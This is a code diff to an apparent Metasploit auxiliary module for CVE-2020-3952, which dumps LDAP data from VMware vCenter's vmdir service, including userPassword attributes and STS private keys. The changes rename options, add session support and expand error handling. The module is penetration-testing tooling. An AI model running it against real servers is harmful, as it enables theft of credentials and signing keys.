@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::LDAP
+  include Msf::OptionalSession::LDAP
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
@@ -18,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
           the vmdir service in VMware vCenter Server version 6.7 prior to the
           6.7U3f update, only if upgraded from a previous release line, such as
           6.0 or 6.5.
-          If the bind username and password are provided (BIND_DN and BIND_PW
+          If the bind username and password are provided (BIND_DN and LDAPPassword
           options), these credentials will be used instead of attempting an
           anonymous bind.
         },
@@ -37,7 +38,8 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'DefaultAction' => 'Dump',
         'DefaultOptions' => {
-          'SSL' => true
+          'SSL' => true,
+          'RPORT' => 636
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -48,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     register_options([
-      Opt::RPORT(636), # SSL/TLS
       OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it'])
     ])
   end
@@ -77,33 +78,40 @@ class MetasploitModule < Msf::Auxiliary
       else
         print_status('Discovering base DN automatically')
 
-        unless (@base_dn = discover_base_dn(ldap))
+        unless (@base_dn = ldap.base_dn)
           print_warning('Falling back on default base DN dc=vsphere,dc=local')
         end
       end
 
-      print_status("Dumping LDAP data from vmdir service at #{peer}")
+      print_status("Dumping LDAP data from vmdir service at #{ldap.peerinfo}")
 
       # A "-" meta-attribute will dump userPassword (hat tip Hynek)
       # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/ldap-head/result.c#L647-L654
       entries = ldap.search(base: base_dn, attributes: %w[* + -])
+
+      # Look for an entry with a non-empty vmwSTSPrivateKey attribute
+      unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }
+        print_error("#{ldap.peerinfo} is NOT vulnerable to CVE-2020-3952") unless datastore['LDAPPassword'].present?
+        print_error('Dump failed')
+        return Exploit::CheckCode::Safe
+      end
+
+      print_good("#{ldap.peerinfo} is vulnerable to CVE-2020-3952") unless datastore['LDAPPassword'].present?
+      pillage(entries)
+
+      # HACK: Stash discovered base DN in CheckCode reason
+      Exploit::CheckCode::Vulnerable(base_dn)
     end
-
-    # Look for an entry with a non-empty vmwSTSPrivateKey attribute
-    unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }
-      print_error("#{peer} is NOT vulnerable to CVE-2020-3952") unless datastore['BIND_PW'].present?
-      print_error('Dump failed')
-      return Exploit::CheckCode::Safe
-    end
-
-    print_good("#{peer} is vulnerable to CVE-2020-3952") unless datastore['BIND_PW'].present?
-    pillage(entries)
-
-    # HACK: Stash discovered base DN in CheckCode reason
-    Exploit::CheckCode::Vulnerable(base_dn)
+  rescue Errno::ECONNRESET
+    fail_with(Failure::Disconnected, 'The connection was reset.')
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+    fail_with(Failure::NoAccess, e.message)
+  rescue Rex::Proto::LDAP::LdapException => e
+    fail_with(Failure::NoAccess, e.message)
   rescue Net::LDAP::Error => e
-    print_error("#{e.class}: #{e.message}")
-    Exploit::CheckCode::Unknown
+    fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
   end
 
   def pillage(entries)
